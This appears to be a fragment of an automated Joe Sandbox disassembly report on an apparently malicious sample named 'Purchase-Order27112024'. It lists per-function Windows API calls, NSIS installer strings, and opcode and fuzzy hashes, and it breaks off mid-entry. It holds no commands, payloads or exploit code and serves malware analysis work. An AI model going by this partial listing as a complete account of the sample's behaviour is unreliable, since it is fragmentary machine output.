                                                                                                      • Instruction Fuzzy Hash: 53316BB5600644EFFF219A78EA44B66B7FAEF00370F5054AEE848D7150DE39A980DF15
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                                                                        • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                      Strings
                                                                                                      • Null, xrefs: 00402EB5
                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                      • Inst, xrefs: 00402EA3
                                                                                                      • Error launching installer, xrefs: 00402E0C
                                                                                                      • soft, xrefs: 00402EAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                      • API String ID: 2803837635-787788815
                                                                                                      • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                                                      • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                                                                      • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                                                      • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                                                                      • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                                                                      • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                                                                      • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00406113
                                                                                                      • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                                                                      • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                                                                      Strings
                                                                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                      • API String ID: 900638850-730719616
                                                                                                      • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                                                                      • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                                                                      • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                                                                      • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 370059EA
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 370059F6
                                                                                                      • _free.LIBCMT ref: 37005A01
                                                                                                      • _free.LIBCMT ref: 37005A0C
                                                                                                      • _free.LIBCMT ref: 37005A17
                                                                                                      • _free.LIBCMT ref: 37005A22
                                                                                                      • _free.LIBCMT ref: 37005A2D
                                                                                                      • _free.LIBCMT ref: 37005A38
                                                                                                      • _free.LIBCMT ref: 37005A43
                                                                                                      • _free.LIBCMT ref: 37005A51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 742f73e1a921d6086ba0042b3ac0c1348b1cafc77541453aabb35b26904d0422
                                                                                                      • Instruction ID: 9f46928fe6b8102eabaa4eeea6b8317b4f7bbc569975c543719b7d1410290c50
                                                                                                      • Opcode Fuzzy Hash: 742f73e1a921d6086ba0042b3ac0c1348b1cafc77541453aabb35b26904d0422
                                                                                                      • Instruction Fuzzy Hash: 4011A4BA520548FFEB11DF98DA45CDD3FA9EF04260B4540E1BD088B221DA35EF50AF85
                                                                                                      APIs
                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D1B
                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37001D37
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D4B
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D58
                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D72
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D7D
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37001D8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1454806937-0
                                                                                                      • Opcode ID: aa6690e0d38c62fa0c1d2e7f166be9f42b5de516c805379f4265f952f355b406
                                                                                                      • Instruction ID: 1e9961ae5ad945b7101226cdb793255b88ce0bef47609fdf777f7120f017bcee
                                                                                                      • Opcode Fuzzy Hash: aa6690e0d38c62fa0c1d2e7f166be9f42b5de516c805379f4265f952f355b406
                                                                                                      • Instruction Fuzzy Hash: 7621FCB594121CAFE7109BA0CC8DFEF76ECFB08365F0105A5F525E2140D6789E468E71
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                      • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                      • GetSysColor.USER32(?), ref: 00404265
                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                      • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2320649405-0
                                                                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                      • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                      • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                                                      APIs
                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,37009C07,?,00000000,?,00000000,00000000), ref: 370094D4
                                                                                                      • __fassign.LIBCMT ref: 3700954F
                                                                                                      • __fassign.LIBCMT ref: 3700956A
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 37009590
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,37009C07,00000000,?,?,?,?,?,?,?,?,?,37009C07,?), ref: 370095AF
                                                                                                      • WriteFile.KERNEL32(?,?,00000001,37009C07,00000000,?,?,?,?,?,?,?,?,?,37009C07,?), ref: 370095E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1324828854-0
                                                                                                      • Opcode ID: ab809530a4d5d0917aa1ac36cced87f098c3b51862f8ae7d96540ee9d386d69f
                                                                                                      • Instruction ID: 4414f36068d37b02f1e6959def70abe4b6aa9d2bb43b00b083e1d4be3c2a49ad
                                                                                                      • Opcode Fuzzy Hash: ab809530a4d5d0917aa1ac36cced87f098c3b51862f8ae7d96540ee9d386d69f
                                                                                                      • Instruction Fuzzy Hash: F45195B5910205AFEB00CFA8C895BEEBBF4EF09320F15415AE595F7281D674A941CF61
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                        • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                      • String ID: 9
                                                                                                      • API String ID: 1149667376-2366072709
                                                                                                      • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                                                                      • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                                                                      • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                                                                      • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 3700339B
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 370033A3
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 37003431
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 3700345C
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 370034B1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: 149c4eca7f2733c7e94c653e60e03d9f2dc411cc81d9b77c20958392e37025dd
                                                                                                      • Instruction ID: e5bdea232fcd4b72636e3628556bb75feeed90e12688b4809465e8b44f42bc20
                                                                                                      • Opcode Fuzzy Hash: 149c4eca7f2733c7e94c653e60e03d9f2dc411cc81d9b77c20958392e37025dd
                                                                                                      • Instruction Fuzzy Hash: 27418478A002089BEB02CF78CC8469EFBE5BF49334F5081D9D915AB251DB75AA15CF91
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3294113728-0
                                                                                                      • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                                                                      • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                                                                      • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                                                                      • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                      • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                      • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                                                      • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 2531174081-0
                                                                                                      • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                                                                      • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                                                                      • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                                                                      • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                                                                      APIs
                                                                                                        • Part of subcall function 37009221: _free.LIBCMT ref: 3700924A
                                                                                                      • _free.LIBCMT ref: 370092AB
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 370092B6
                                                                                                      • _free.LIBCMT ref: 370092C1
                                                                                                      • _free.LIBCMT ref: 37009315
                                                                                                      • _free.LIBCMT ref: 37009320
                                                                                                      • _free.LIBCMT ref: 3700932B
                                                                                                      • _free.LIBCMT ref: 37009336
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                      • Instruction ID: 03b5724f2ced4f76a404c9168d9deef89e82be8d778941299b2167b9ce24c559
                                                                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                      • Instruction Fuzzy Hash: 43118171564B08FEF620EBF0DE49FCB7B9D9F04720F400864AADD76052DA28B6145F52
                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                      • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                      • wsprintfW.USER32 ref: 00402D81
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                        • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                      • String ID: ... %d%%
                                                                                                      • API String ID: 722711167-2449383134
                                                                                                      • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                                                                      • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                                                                      • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                                                                      • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                                                                      • GetMessagePos.USER32 ref: 00404ADF
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                      • String ID: f
                                                                                                      • API String ID: 41195575-1993550816
                                                                                                      • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                      • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                                                                      • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                      • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                      • wsprintfW.USER32 ref: 00402CD1
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                      • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                                                      • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
